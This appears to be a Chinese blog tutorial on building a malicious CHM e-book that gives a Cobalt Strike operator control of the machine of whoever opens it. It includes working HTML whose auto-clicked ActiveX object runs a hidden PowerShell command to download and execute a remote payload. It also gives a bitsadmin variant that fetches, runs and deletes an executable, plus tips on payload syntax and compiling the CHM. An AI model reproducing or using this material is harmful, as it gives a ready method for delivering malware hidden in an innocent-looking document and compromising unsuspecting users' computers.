电子书(chm)-加载JS--CS上线

免责声明:

本文仅做技术交流与学习...

目录

cs--web投递

html(js)代码

html生成chm工具--EasyCHM

[1-选择powershell 模式 生成](#1-选择powershell 模式 生成)

2-选择bitsadmin模式生成

chm反编译成html


cs--web投递

cs配置监听器--->攻击---->web投递--->

端口选择没占用的,

URL路径到时候会在你的服务器自动生成,

选择监听器.

html(js)代码

html 复制代码
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://IP:PORT/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

生成后的初始命令:

1、powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx/a'))"

2、cmd.exe /c bitsadmin /transfer 0218 http://xxx:xx/a %APPDATA%\0218.exe&%APPDATA%\0218.exe&del %APPDATA%\0218.exe

要注意三个地方:

<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://IP:PORT/a'))">

(1) value值的第一个为逗号

(2)生成的命令带双引号的话就去掉

(3)调用cmd或powershell程序后面要加逗号


html生成chm工具--EasyCHM

生成chm之前提前把html放在一个文件夹里.

--->成功生成chm


1-选择powershell 模式 生成

运行--->


2-选择bitsadmin模式生成

与上面方法一样

--生成payload后--->替换到html中---->编译生成chm---->执行

需要数据传输完成才能上线.


chm反编译成html

hh.exe软件windows自带.

hh.exe -decompile .\\html xxx.chm

相关推荐
云卓SKYDROID12 分钟前
无人机的激光雷达避障系统阐述!
科技·安全·无人机·云卓科技·激光雷达避障系统
恃宠而骄的佩奇35 分钟前
i春秋-签到题
web安全·网络安全·蓝桥杯
网安-轩逸43 分钟前
网络安全、Web安全、渗透测试之笔经面经总结
安全·web安全
follycat1 小时前
信息收集--CDN绕过
网络·安全·网络安全
zhangjr05751 小时前
【HarmonyOS Next】鸿蒙实用装饰器一览(一)
前端·harmonyos·arkts
黑客Ela1 小时前
网络安全问题概述
安全·web安全·php
不爱学习的YY酱1 小时前
【操作系统不挂科】<CPU调度(13)>选择题(带答案与解析)
java·linux·前端·算法·操作系统
Wh1teR0se1 小时前
详解php://filter--理论
web安全·php
木子七2 小时前
vue2-vuex
前端·vue
麻辣_水煮鱼2 小时前
vue数据变化但页面不变
前端·javascript·vue.js